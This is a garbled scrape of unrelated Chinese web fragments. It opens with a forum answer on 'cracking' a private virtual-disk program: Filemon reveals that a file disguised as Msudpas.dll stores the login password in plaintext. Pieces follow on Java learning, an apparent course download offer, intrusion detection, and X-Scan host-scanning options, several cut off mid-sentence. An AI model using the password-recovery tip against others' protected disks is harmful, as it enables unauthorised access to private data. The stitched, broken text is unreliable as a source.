上面都是关于如何创建管理虚拟磁盘的,知道了它的原理对其进行“破解”就不是什么难事了,首先准备工具Filemon,这是一款文件读写跟踪工具,用它可以发现“私人磁盘”在进行用户登录密码校验时操作了系统目录下(X:\windows\system32)的Msudpas.dll,表面看它是一个动态链接库,但是它却是一个不折不扣的文本文件,可以用记事本打开,发现里存放的正是密码的明文,不可思议。到这步能做什么,我想大家应该都知道了吧!网上发现还有8.0的版本经测试多了图片文件(用记事本打开也是明文)。
纯手打望采纳
关于java学习,有什么书籍或者教程推荐不啦?
java Netty实战课程java高性能分布式RPC教程课程 免费下载
链接:
提取码:kvvv
Java是一门面向对象的编程语言,不仅吸收了C++语言的各种优点,还摒弃了C++里难以理解的多继承、指针等概念,因此Java语言具有功能强大和简单易用两个特征。Java语言作为静态面向对象编程语言的代表,极好地实现了面向对象理论,允许程序员以优雅的思维方式进行复杂的编程
置简单,不需要任何特殊的审计和登录机制;可检测协议攻击、特定环境的攻击等多种攻击。但它只能监视经过本网段的活动,无法得到主机系统的实时状态,精确度较差。大部分入侵检测工具都是基于网
] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统